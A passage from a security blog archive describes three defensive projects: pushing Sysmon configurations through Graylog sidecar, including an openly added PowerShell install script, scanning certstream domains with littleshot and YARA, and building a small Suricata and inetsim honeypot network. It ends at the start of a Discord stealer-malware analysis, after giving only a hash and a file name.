src="https://blogger.googleusercontent.com/img/a/AVvXsEg1udc_OSEWuAohjONARGALw5ZC6K6A1xy-v-p5gEZXQmP_3aa077kNGeUqyRp7h7aFdErxYJQ0FGXoPakF69oETnwtNsYZnxyez7HPSaMKVeaAOAHV68I6RffheaSwtRvc1aPVo7-_i9kiuqqC5UsbnS1_ZWhMUQGBhlJXcIDUWB721QbjZlDnrdX6=w369-h222" width="369" /></a></div><br />Check Sysmon and select the right sysmon configuration and apply the configuration.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEi3G0BH0vAgfJ12Ep7Az1FSmlZk1XNCIxy09tTKOvSl7JSidJq5dz6GXzxrWLZEVg8Bdqp-3UNRW30kV77UuPwGY4Iui9PRYUxZO1ceshbPlC8j1gZ7YulbEAYwmxTL4-_hCxprOTo7bRVVkHpdHcE_pXrQAfpnLD9zJMut7Cg-kGPmXrcJCgE6u9cD" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="257" data-original-width="591" height="171" src="https://blogger.googleusercontent.com/img/a/AVvXsEi3G0BH0vAgfJ12Ep7Az1FSmlZk1XNCIxy09tTKOvSl7JSidJq5dz6GXzxrWLZEVg8Bdqp-3UNRW30kV77UuPwGY4Iui9PRYUxZO1ceshbPlC8j1gZ7YulbEAYwmxTL4-_hCxprOTo7bRVVkHpdHcE_pXrQAfpnLD9zJMut7Cg-kGPmXrcJCgE6u9cD=w394-h171" width="394" /></a></div><br />Graylog webui may say the update failed but you can click the host you updated and click Show details to see more:<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhf9ei0_kD0NdA26rgqGJwc0XJW1mWEubPJtwS6bMu0qsPRXJNlDtVLekFULvv-OM6Z6OXJ7mTw3SxKLrkoaj6zFoYAWX3t7dfPn5yIn2ZeJqe01tuKjqclGHTvwyy3UDGZPW2StCQ9WShZH51Ncv3RfkdnuZ0liG_nls_ZKHTYDkCybEa_I_T27mAn" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="515" data-original-width="1707" height="198" src="https://blogger.googleusercontent.com/img/a/AVvXsEhf9ei0_kD0NdA26rgqGJwc0XJW1mWEubPJtwS6bMu0qsPRXJNlDtVLekFULvv-OM6Z6OXJ7mTw3SxKLrkoaj6zFoYAWX3t7dfPn5yIn2ZeJqe01tuKjqclGHTvwyy3UDGZPW2StCQ9WShZH51Ncv3RfkdnuZ0liG_nls_ZKHTYDkCybEa_I_T27mAn=w654-h198" width="654" /></a></div><br />Above you can see that the configuration updated without an issue. 
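<p>One way to script the host-side steps in this post, as an added example that is not part of the original post or of the Graylog or Sysinternals projects: a PowerShell post-install script for the kind of package the post recommends building. It copies sysmon64.exe into the sidecar folder, adds it to the sidecar.yml binary allow-list, installs Sysmon with an initial config, registers and starts the sidecar service, and finally reads Sysmon event ID 16 (config state changed) so a config pushed from Graylog can be confirmed on the host. The package layout (sysmon64.exe and sysmon-initial.xml next to the script) and the YAML key name collector_binaries_accesslist are assumptions; check them against your own sidecar.yml. The install path is the default named above.</p>

```powershell
# Added example (not from the original post, Graylog, or Sysinternals): one script that does the
# host-side steps the post walks through by hand, then checks the Sysmon log for a config change.
# Run it from an elevated PowerShell session with sysmon64.exe and an initial config next to it.
# Assumptions, marked as such: the sidecar install path is the default named in the post; the YAML
# key 'collector_binaries_accesslist' is the allow-list key in recent sidecar releases (older
# releases used a different name, so verify it in your own sidecar.yml before relying on it).

$SidecarDir = 'C:\Program Files\Graylog\sidecar'
$SidecarExe = Join-Path $SidecarDir 'graylog-sidecar.exe'
$SidecarYml = Join-Path $SidecarDir 'sidecar.yml'
$SysmonDst  = Join-Path $SidecarDir 'sysmon64.exe'          # lower case: must match the entry in sidecar.yml
$SysmonSrc  = Join-Path $PSScriptRoot 'sysmon64.exe'        # shipped inside the package (assumed layout)
$InitialCfg = Join-Path $PSScriptRoot 'sysmon-initial.xml'  # initial Sysmon config shipped with the package (assumed name)

function Assert-Elevated {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($id)
    if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
        throw 'Service installation and Sysmon need an elevated session.'
    }
}

function Add-SidecarAllowedBinary {
    # Sidecar only launches collector binaries that are on its access list, so the sysmon path
    # has to be added before a Sysmon collector configuration can run on this host.
    param([string]$YmlPath, [string]$BinaryPath)
    $entry = '  - "' + $BinaryPath.Replace('\', '\\') + '"'   # YAML double-quoted string: escape backslashes
    $lines = @(Get-Content -Path $YmlPath)
    if ($lines -contains $entry) { return }                   # already allowed, leave the file untouched
    $out = New-Object System.Collections.Generic.List[string]
    $added = $false
    foreach ($line in $lines) {
        $out.Add($line)
        if (-not $added -and $line -match '^collector_binaries_accesslist:') {
            $out.Add($entry)                                 # insert as the first list item under the key
            $added = $true
        }
    }
    if (-not $added) {                                       # key missing entirely: append it
        $out.Add('collector_binaries_accesslist:')
        $out.Add($entry)
    }
    Set-Content -Path $YmlPath -Value $out.ToArray() -Encoding UTF8
}

function Install-SysmonWithInitialConfig {
    Copy-Item -Path $SysmonSrc -Destination $SysmonDst -Force
    # -accepteula and -i <config> are Sysmon's install switches; later config pushes from
    # Graylog use -c "%s", exactly as the collector definition in the post does.
    & $SysmonDst -accepteula -i $InitialCfg
    if ($LASTEXITCODE -ne 0) { throw "Sysmon install failed with exit code $LASTEXITCODE" }
}

function Install-SidecarService {
    # Same two commands the post runs by hand; sidecar.yml is already edited at this point.
    & $SidecarExe -service install
    & $SidecarExe -service start
}

function Get-SysmonConfigChange {
    # Sysmon event ID 16 ("Sysmon config state changed") is written whenever a config is applied,
    # so its newest entries tell you whether a push from the sidecar UI actually landed.
    param([int]$MaxEvents = 5)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 16 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Property order follows the event schema: UtcTime, Configuration, ConfigurationFileHash.
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                ConfigFile  = $_.Properties[1].Value
                ConfigHash  = $_.Properties[2].Value
            }
        }
}

Assert-Elevated
Add-SidecarAllowedBinary -YmlPath $SidecarYml -BinaryPath $SysmonDst
Install-SysmonWithInitialConfig
Install-SidecarService
Get-SysmonConfigChange | Format-Table -AutoSize
```

<p>Run it once as the package's post-install step; afterwards, re-running only Get-SysmonConfigChange is a quick way to check on the host whether a configuration applied from the sidecar Administration page was picked up, independently of what the Graylog web UI reports.</p>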
<p></p><p>You can also confirm the update by looking at event id 16 from sysmon in your SIEM or Event Viewer like below</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEidxAmByWLQ6Qf5i5Q6-QqEj0gzpekdo6IEAcqA4yQALFvqoMJU1NAP4GPp1q0XI20cTSj28DU0czKEccR7FMK-uFqKpiyjaUXfIniuzvYwaidU1G6vd8Qs7Caf8CRusNgjfuACW69eAEcayzrnW8NZnrNOLFS36lj8olvWlunVvcThq97I6SKKPUd9" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="372" data-original-width="588" height="285" src="https://blogger.googleusercontent.com/img/a/AVvXsEidxAmByWLQ6Qf5i5Q6-QqEj0gzpekdo6IEAcqA4yQALFvqoMJU1NAP4GPp1q0XI20cTSj28DU0czKEccR7FMK-uFqKpiyjaUXfIniuzvYwaidU1G6vd8Qs7Caf8CRusNgjfuACW69eAEcayzrnW8NZnrNOLFS36lj8olvWlunVvcThq97I6SKKPUd9=w452-h285" width="452" /></a></div><br /><br /><p></p><h3 style="text-align: left;">Building initial installation package recommendations:</h3><p>Your initial sidecar agent package should do the following:</p><p></p><ul style="text-align: left;"><li>Drop sysmon executable in the sidecar folder</li><li>Sidecar.yml file needs to contain path for sysmon executable in the allowed files</li><li>Install sysmon with whatever initial configuration you'd like to use</li></ul><div>If you build an installation package yourself, you don't have to do all the stuff manually above...</div><p></p><p>Once you deploy sidecar agent + sysmon initially, you can remotely manage the sysmon configuration through Graylog sidecar UI.</p><h2 style="text-align: left;">Links/Resources:</h2><p><a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon">https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon</a></p><p><a href="https://www.graylog.org/">https://www.graylog.org/</a></p><p><a href="https://www.graylog.org/features/sidecar">https://www.graylog.org/features/sidecar</a></p><p><a 
 href="https://github.com/Graylog2/collector-sidecar/releases">https://github.com/Graylog2/collector-sidecar/releases</a></p><p><a href="https://docs.graylog.org/docs/sidecar">https://docs.graylog.org/docs/sidecar</a></p><p><a href="https://github.com/olafhartong/sysmon-modular">https://github.com/olafhartong/sysmon-modular</a></p><p><a href="https://github.com/SwiftOnSecurity/sysmon-config">https://github.com/SwiftOnSecurity/sysmon-config</a></p><p><a href="https://github.com/LaresLLC/SysmonConfigPusher">https://github.com/LaresLLC/SysmonConfigPusher</a> - I came across this after finishing this write up...</p><h2 style="text-align: left;">Screenshotting/scanning domains from certstream with littleshot to find interesting content</h2><p>Posted 2022-07-20</p><h3 style="text-align: left;"><b>Introduction:</b></h3><p>Certstream is a great service which provides updates from the Certificate Transparency Logs, which carry info about certs being issued by several providers.</p><p>Certstream data has been used in the past for detection of malicious sites or phishing sites. There are several links in the resources section about certstream usage.</p><p>Littleshot is a tool similar to urlscan and urlquery (RIP) which I wrote a while ago because I wanted to be able to screenshot a ton of sites and collect metadata regarding them. (It's here: <a href="https://github.com/BoredHackerBlog/littleshot">https://github.com/BoredHackerBlog/littleshot</a>) I realized having yara scan the HTML body would be cool so I added that feature as well later on. There is also a branch that uses tor for connections. 
 It's not the most optimized project and error handling isn't the best, but it's good enough for my purposes.</p><p>You can also put newly registered domains through littleshot, but I've decided not to do that for now.</p><h3 style="text-align: left;"><b>Goals:</b></h3><p>- Take certstream domains and scan them with littleshot</p><p>- Utilize yara rules to look for interesting pages</p><p>- Send some metadata to Humio (littleshot by default doesn't do this) for either alerting, dashboarding, or just searching.</p><p>- Ensure that there is caching of domains from certstream to avoid rescanning domains</p><h3 style="text-align: left;"><b>Tech stack:</b></h3><p>I'm hosting everything on vultr. (Here's a ref link if you'd like to try vultr for your projects: https://www.vultr.com/?ref=8969054-8H)</p><p>- Littleshot</p><p>-- caddy - reverse proxy</p><p>-- flask - webapp</p><p>-- redis - job queue</p><p>-- python-rq - job distribution/workers</p><p>-- mongodb - store json documents/metadata</p><p>-- minio - store screenshots</p><p>- Certstream + python - I'm getting certstream domains and doing filtering and cache lookups with python</p><p>- Memcached - Caching. 
 I want to avoid scanning the same domain twice for a while, so I'm using memcached</p><h3 style="text-align: left;">Setup:</h3><p>The diagram below shows the setup I have going.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj4c0RKa-_GBywKVUh2Mo2fA4bUjhhDztYJxOro3K6dWqor-VVwPmaAnsye5uRXADkYm8cRF7fM7_mZcJBKx0FWQhO-BZ-WGtF7ehG1fNChCgdlDmbSvYhDjW6cl86JCRn80EPrDg0-9Mrwtxlhh4kvqtymhaQcbYd1ajDqWbJjjO3LmwsC12lgdRL1" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="520" data-original-width="816" height="408" src="https://blogger.googleusercontent.com/img/a/AVvXsEj4c0RKa-_GBywKVUh2Mo2fA4bUjhhDztYJxOro3K6dWqor-VVwPmaAnsye5uRXADkYm8cRF7fM7_mZcJBKx0FWQhO-BZ-WGtF7ehG1fNChCgdlDmbSvYhDjW6cl86JCRn80EPrDg0-9Mrwtxlhh4kvqtymhaQcbYd1ajDqWbJjjO3LmwsC12lgdRL1=w640-h408" width="640" /></a></div><br /><p></p><p>I get data from certstream and I'm using some filtering to ensure that I don't scan certain domains.</p><p>Once the keyword-based filtering is done, I check the domain against memcached to ensure that it hasn't been scanned in the past 48 hours.</p><p>If the domain wasn't scanned in the past 48 hours, I queue it to be scanned with littleshot.</p><p>When the littleshot worker does the scan, it sends the task ID, domain, title, and yara matches to Humio (besides doing the normal littleshot things).</p><p>Certstream_to_littleshot script - <a href="https://github.com/BoredHackerBlog/certstream_to_littleshot/blob/main/certstream_to_littleshot.py">https://github.com/BoredHackerBlog/certstream_to_littleshot/blob/main/certstream_to_littleshot.py</a></p><p>Yara rules (these aren't the best. 
you should probably write your own based on your needs) - <a href="https://github.com/BoredHackerBlog/certstream_to_littleshot/blob/main/rules.yar">https://github.com/BoredHackerBlog/certstream_to_littleshot/blob/main/rules.yar</a></p><p>Worker code to support sending data to Humio - <a href="https://github.com/BoredHackerBlog/certstream_to_littleshot/blob/main/worker.py">https://github.com/BoredHackerBlog/certstream_to_littleshot/blob/main/worker.py</a></p><p><br /></p><h3 style="text-align: left;">Interesting stuff I came across:</h3><div>- Lots of wordpress and nextcloud/owncloud sites and general stuff people self-host</div><div>- Carding forum?</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgh3hoVia4aLr2VCMiKfi1TrDdpGQSguuBM142GZyACNNM9GDdhf7ZkFBqO882j88rFiZ1EOLQs3T0JG7K_dL2YJVN-ARW75CG8VHo_4cIv2M-RHyhbSv_NRTQLnaD2knuyjD4e3lo4q0JjhKa5375Ta-MOCWTWhLirRmfxuzK7llZgEVQ_LcW9nskn" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="471" data-original-width="1149" height="131" src="https://blogger.googleusercontent.com/img/a/AVvXsEgh3hoVia4aLr2VCMiKfi1TrDdpGQSguuBM142GZyACNNM9GDdhf7ZkFBqO882j88rFiZ1EOLQs3T0JG7K_dL2YJVN-ARW75CG8VHo_4cIv2M-RHyhbSv_NRTQLnaD2knuyjD4e3lo4q0JjhKa5375Ta-MOCWTWhLirRmfxuzK7llZgEVQ_LcW9nskn" width="320" /></a></div><br />- Argo CI/CD without auth?</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj3QHYpF1RA_zorInpUw4YJizxIdVp4rZWqpUVsroHCEL0AmdbxLvG9wlWa-9Mn1Qm3_Gt0Q_MvlBpmp7y3s_DE4baZqkn1MckrdSEemiXmbvQbL-z36ndoXe79xzh481Z2ligZduvhy-qGGGQmZ1v-Ss3sSrvhuYpyiKMbrvfl8c7GrY0TJsEOiEzk" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="276" data-original-width="394" height="224" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEj3QHYpF1RA_zorInpUw4YJizxIdVp4rZWqpUVsroHCEL0AmdbxLvG9wlWa-9Mn1Qm3_Gt0Q_MvlBpmp7y3s_DE4baZqkn1MckrdSEemiXmbvQbL-z36ndoXe79xzh481Z2ligZduvhy-qGGGQmZ1v-Ss3sSrvhuYpyiKMbrvfl8c7GrY0TJsEOiEzk" width="320" /></a></div>- Piracy site</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEinxRtzMKJgRPFm8-xRW9n-i2StQvYYEKKZ-3GCJKgPvoHAw97qY6_AZb8Z7kZVejO3ZwRCFfD2yeC1w6UmeSCHxFgWJfGhH2NWYAd-D2ePPy4iLpAO9vrEPdb8h2M9u6kurSMccVb3A3we89P5JxS6JvbFSlok_EDyqcRPcKGnWu17kDTEviHPWXrH" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="592" data-original-width="694" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEinxRtzMKJgRPFm8-xRW9n-i2StQvYYEKKZ-3GCJKgPvoHAw97qY6_AZb8Z7kZVejO3ZwRCFfD2yeC1w6UmeSCHxFgWJfGhH2NWYAd-D2ePPy4iLpAO9vrEPdb8h2M9u6kurSMccVb3A3we89P5JxS6JvbFSlok_EDyqcRPcKGnWu17kDTEviHPWXrH" width="281" /></a></div><br /><br /></div><div>No phishing sites or C2 with at least my yara rules.<br /><br /></div><div>Here are the yara hits in Humio (ignore abc,xyz, that was me testing Humio API):</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh7t0pwT8ZPzlQJ6cHf7QRHkrvo0APGSfykXCuNCLd6-pmlTvo9U-d6V2ya9IlqDPXwK3ariCbMQBDUdtWm4adxs7Hm-bf0l3WZRnu2G6-eybBEQz5QwSpbvRy_5Y9Y0wESmPwFPkrGIT6NsRS3zOOEhrUObrI1viZofZfrqdJpY75KKmQYopvjXp2V" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="653" data-original-width="834" height="500" src="https://blogger.googleusercontent.com/img/a/AVvXsEh7t0pwT8ZPzlQJ6cHf7QRHkrvo0APGSfykXCuNCLd6-pmlTvo9U-d6V2ya9IlqDPXwK3ariCbMQBDUdtWm4adxs7Hm-bf0l3WZRnu2G6-eybBEQz5QwSpbvRy_5Y9Y0wESmPwFPkrGIT6NsRS3zOOEhrUObrI1viZofZfrqdJpY75KKmQYopvjXp2V=w640-h500" width="640" /></a></div><br /><br /></div><div><div class="separator" style="clear: both; text-align: center;"><br 
 /></div></div><div><h3 style="text-align: left;">What I would do differently with more time and resources (with this project and with littleshot):</h3><div><div>- Better error handling - current error handling is meh</div><div>- Get rid of mongodb and replace it with opensearch or graylog maybe? - Opensearch and graylog are great when it comes to searching.</div><div>- Potentially having an indicator list built into littleshot?</div><div>-- Currently tagging is based on yara rules, but there are many other ways to detect maliciousness, such as hashes or URLs.</div><div>- Enrichment of data like urlscan does</div><div>- Better webui - the webui is pretty shit. I don't know enough html/css/javascript</div><div>- Better logging. There is logging of results but no logging of anything else (queries, crashes, etc...)</div></div><div>- Redirect detection & tagging. Some domains do redirect to legitimate login pages.</div><h3 style="text-align: left;">Resources & similar projects:</h3><div><a href="https://medium.com/cali-dog-security/introducing-certstream-3fc13bb98067">https://medium.com/cali-dog-security/introducing-certstream-3fc13bb98067</a></div><div><a href="https://certstream.calidog.io/">https://certstream.calidog.io/</a></div><div><a href="https://www.youtube.com/watch?v=s5g7ij5EKoA">https://www.youtube.com/watch?v=s5g7ij5EKoA</a></div><div><a href="https://medium.com/security-analytics/elasticphish-using-certstream-and-the-elastic-stack-for-phishing-intelligence-b03b86ad5cfe">https://medium.com/security-analytics/elasticphish-using-certstream-and-the-elastic-stack-for-phishing-intelligence-b03b86ad5cfe</a></div><div><a href="https://blog.0day.rocks/catching-phishing-using-certstream-97177f0d499a">https://blog.0day.rocks/catching-phishing-using-certstream-97177f0d499a</a></div><div><a href="https://github.com/x0rz/phishing_catcher">https://github.com/x0rz/phishing_catcher</a></div><div><a 
 href="https://github.com/ninoseki/uzen">https://github.com/ninoseki/uzen</a> - ninoseki's GitHub has really cool projects. This one is very similar to littleshot actually.</div><div><a href="https://www.boredhackerblog.info/2017/01/python-rq-example.html">https://www.boredhackerblog.info/2017/01/python-rq-example.html</a></div><div><a href="https://github.com/InfosecExtra/StreamshotY">https://github.com/InfosecExtra/StreamshotY</a> - a littleshot fork that someone hooked up with certstream. It also has an auto-refreshing page of screenshots, like urlscan.</div></div><div><br /></div><div>(if the blog post formatting looks odd, it's because Blogger editor interface hates me)</div><h2 style="text-align: left;">Building a honeypot network with inetsim, suricata, vector.dev, and appsmith</h2><p>Posted 2022-07-13</p>I wanted to learn a bit more about data engineering, databases, app building, managing systems, and so on, so I decided to work on a small honeypot network as a project. I was partially inspired by Greynoise and AbuseIPDB; I use both of those a lot. I wanted to get this project done in about a week, so this is a small project which isn't too scalable. 
 I ended up learning things so it's fine.<div><br /></div><h3 style="text-align: left;"><b>My goals:</b></h3><div>- Use Suricata to see what type of signatures are triggered by the incoming traffic from the internet</div><div>- Save all the Suricata logs to disk in a central place so I can go back and search all the data or reingest the data.</div><div>- Send logs to Humio for searching, dashboarding, and potentially alerting purposes</div><div>- Have a webapp for searching for an IP</div><div>-- The webapp should show the signatures the IP has triggered, the first time the IP was seen, the last time the IP was seen, and the number of times it was seen triggering signatures.</div><div><br /></div><h3 style="text-align: left;"><b>My tech stack:</b></h3><div>- <b>Sensors & databases</b> are hosted on Vultr w/ Ubuntu</div><div>- Obviously <b>Suricata</b> for detecting the attack attempt type</div><div>- <b>Inetsim</b> - this is not the best (I'm letting the attackers know I'm not running any real services, it's just inetsim, assuming attackers manually go look at the scan results) but it'll do for this project</div><div>- <b>Zerotier</b> - all sensors are connected to a zerotier network, it just makes networking, moving data around, and management easier</div><div>- <b>Vector.dev</b> - I'm using vector.dev to move data around</div><div>- <b>Humio</b> - it's for log storage and search, just like ELK or Splunk</div><div>- <b>rinetd</b> - I'm actually not running inetsim on all the sensors, I'm just forwarding all the traffic from the sensors to one host running inetsim (it's good enough for this project)</div><div>- <b>Redis</b> - pubsub. 
 I'm putting alerts into redis and letting a python script grab them and put the data in postgresql</div><div>- <b>Postgresql</b> - to store malicious IP, signature, and timestamp</div><div>- <b>Appsmith</b> - to make the webui app (usually I'd use flask...)</div><div><br /></div><h3 style="text-align: left;"><b>Networking:</b></h3><div>The network looks roughly like this with Zerotier:</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj_DcMDXZGuLVlN3CWiVKDp6fC-7_f_BcLTy-n2Ezmx5-TRQ7vsqW5LBIRlzYQG5-G2zrb-dAliPsVS92ZLf_5oP_LRsV8QR62L8teBrbTTykvzxB_Hf3kB5E9SkQ0i21bfb9cA9EadmKY82jz0eevaQVtn8kOHduXy3jF_O9R6k3zxSAbNJ0ujPT-_" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="500" data-original-width="717" height="446" src="https://blogger.googleusercontent.com/img/a/AVvXsEj_DcMDXZGuLVlN3CWiVKDp6fC-7_f_BcLTy-n2Ezmx5-TRQ7vsqW5LBIRlzYQG5-G2zrb-dAliPsVS92ZLf_5oP_LRsV8QR62L8teBrbTTykvzxB_Hf3kB5E9SkQ0i21bfb9cA9EadmKY82jz0eevaQVtn8kOHduXy3jF_O9R6k3zxSAbNJ0ujPT-_=w640-h446" width="640" /></a></div><br />Sensors are exposed to the internet; servers aren't. rinetd takes in sensor traffic from the internet and forwards it to inetsim. 
 inetsim is bound to the zerotier IP address.</div><div><br /></div><div>Configuration for rinetd: <a href="https://github.com/BoredHackerBlog/dumbhoneypot/blob/main/rinetd.conf">https://github.com/BoredHackerBlog/dumbhoneypot/blob/main/rinetd.conf</a></div><div><br /></div><h3 style="text-align: left;"><b>Logging:</b></h3><div>The log flow looks roughly like this:</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhShPk_F9LlCJL3QY9OaMYCy2uY2L0WFrDTxW-ClKS75tFii0gw7yNw2m6fpvxwF-glrohY_BDHc4vlHvs3ups9NF4xs1OZx6sRT_J5H3wj0bmsMpqNxdfEw1czJwNZvXMHtSQePPMO0PzA0dtAGWD1TDj2kJsyUcOz67d8wqYHDvp2xITErq5zivMv" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="417" data-original-width="553" height="483" src="https://blogger.googleusercontent.com/img/a/AVvXsEhShPk_F9LlCJL3QY9OaMYCy2uY2L0WFrDTxW-ClKS75tFii0gw7yNw2m6fpvxwF-glrohY_BDHc4vlHvs3ups9NF4xs1OZx6sRT_J5H3wj0bmsMpqNxdfEw1czJwNZvXMHtSQePPMO0PzA0dtAGWD1TDj2kJsyUcOz67d8wqYHDvp2xITErq5zivMv=w640-h483" width="640" /></a></div><br />Vector on all the sensors reads eve.json and sends the data to vector on the ingest server.</div><div>Vector on the ingest server does multiple things. 
 It saves the data to disk and sends it to Humio; the alerts additionally get GeoIP info added and go to Redis, where a Python script picks them up and writes them to Postgres.</div><div><br /></div><div>Postgres stores the malicious IP, the suricata signature, and the timestamp.</div><div><br /></div><div>Sensor vector config: <a href="https://github.com/BoredHackerBlog/dumbhoneypot/blob/main/sensor_vector.toml">https://github.com/BoredHackerBlog/dumbhoneypot/blob/main/sensor_vector.toml</a></div><div><br /></div><div>Server vector config: <a href="https://github.com/BoredHackerBlog/dumbhoneypot/blob/main/server_vector.toml">https://github.com/BoredHackerBlog/dumbhoneypot/blob/main/server_vector.toml</a></div><div><br /></div><div>Python script being used to process redis data and add data to postgres: <a href="https://github.com/BoredHackerBlog/dumbhoneypot/blob/main/process_redis.py">https://github.com/BoredHackerBlog/dumbhoneypot/blob/main/process_redis.py</a></div><div><br /></div><h3 style="text-align: left;">Webapp</h3><div>I used AppSmith for the webapp. AppSmith allows you to build a webapp and connect it to the integrations it supports with little to no coding. </div><div><br /></div><div>For the webapp, I just have an input field and some queries that run based on the input. 
 It looks like this:</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgc2ZHHpQ3kLerbv_SoTFpEWIymCRFSn7WLg-c59kN5D8JDRdn-lm-Y4vKzHutqIADjpN0Bm4zDzoyfNhkWDmKtJ4izRPsXIDwbnQTCch86AWTBD4Jj2LxHSHrA-GDh0_40i1h3kR_vUyzTYbNX_0pSZE4F8U7oPw8XMnXwpg0U9axfgqRmSnlzo008" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" data-original-height="578" data-original-width="764" height="485" src="https://blogger.googleusercontent.com/img/a/AVvXsEgc2ZHHpQ3kLerbv_SoTFpEWIymCRFSn7WLg-c59kN5D8JDRdn-lm-Y4vKzHutqIADjpN0Bm4zDzoyfNhkWDmKtJ4izRPsXIDwbnQTCch86AWTBD4Jj2LxHSHrA-GDh0_40i1h3kR_vUyzTYbNX_0pSZE4F8U7oPw8XMnXwpg0U9axfgqRmSnlzo008=w640-h485" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh7OEQFB5lNGwDOEjpnAogSC7rrKc44qvHlp6i_CsW6oNmf9Kc8BhYGd_5rqjIhwGzqEgdZmvBiFu_OjHtwvxWFJzoMjiHEYuaG3naSDKQIFjMdef2pq1d5F6PY6NVrkaiPBC6g9-2vLqCGm2ewUxoaqk5I3EN49Da6p5A0gJHlUd5iyZ17hRc1py8Z" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="590" data-original-width="733" height="515" src="https://blogger.googleusercontent.com/img/a/AVvXsEh7OEQFB5lNGwDOEjpnAogSC7rrKc44qvHlp6i_CsW6oNmf9Kc8BhYGd_5rqjIhwGzqEgdZmvBiFu_OjHtwvxWFJzoMjiHEYuaG3naSDKQIFjMdef2pq1d5F6PY6NVrkaiPBC6g9-2vLqCGm2ewUxoaqk5I3EN49Da6p5A0gJHlUd5iyZ17hRc1py8Z=w640-h515" width="640" /></a></div><br /><br /></div></div><div><br /></div><div><b>What would I do differently if I had more time and resources:</b></div><div>- I'd probably set up more realistic honeypots or have honeypot profiles</div><div>- Put honeypot software on the sensor itself instead of using rinetd</div><div>- Ship logs through the internet (not zerotier)</div><div>- Do geoip enrichment on the sensor itself</div><div>- Store alert data in opensearch or some 
 cloud hosted database that I don't have to maintain?</div><div>- Add health monitoring for sensors, pipeline, etc.</div><div>- Better deployment and updates (of software and suricata signatures), potentially through ansible?</div><div><br /></div><div>There are probably many other things that can be done differently or more efficiently.</div><div><br /></div><div><b>Code and configs:</b> <a href="https://github.com/BoredHackerBlog/dumbhoneypot">https://github.com/BoredHackerBlog/dumbhoneypot</a></div><div><br /></div><div><b>Resources/links:</b></div><div><a href="https://vector.dev/">https://vector.dev/</a></div><div><a href="https://www.inetsim.org/">https://www.inetsim.org/</a></div><div><a href="https://viz.greynoise.io/">https://viz.greynoise.io/</a></div><div><a href="https://www.abuseipdb.com/">https://www.abuseipdb.com/</a></div><div><a href="https://opensearch.org/">https://opensearch.org/</a></div><div><a href="https://www.appsmith.com/">https://www.appsmith.com/</a></div><div><a href="https://www.humio.com/">https://www.humio.com/</a></div><div><a href="https://www.zerotier.com/">https://www.zerotier.com/</a></div><div><a href="https://suricata.io/">https://suricata.io/</a></div><h2 style="text-align: left;">Quick analysis of stealer malware sent via discord</h2><p>Posted 2022-03-05</p><p><b>Introduction:</b></p><p>Just a quick analysis of malware sent via discord...</p><p>I got the malicious file from someone who received the file via Discord from a trusted account (which was compromised...)</p><p><br /></p><p><b>Analysis:</b></p><p>Hash: 4f709e1c6951bbd65d03a9f44961e0ae</p><p>Original filename: Fruit_of_the_ace_v3.11.99.exe</p><p>The file looked like a nodejs binary:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a 
